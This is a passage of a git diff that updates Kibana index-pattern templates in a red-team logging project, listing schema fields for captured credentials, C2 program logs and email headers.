Types\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.2", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152839362, 1858], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1645363327726, 1150], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson index a23bc9dc..27139640 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\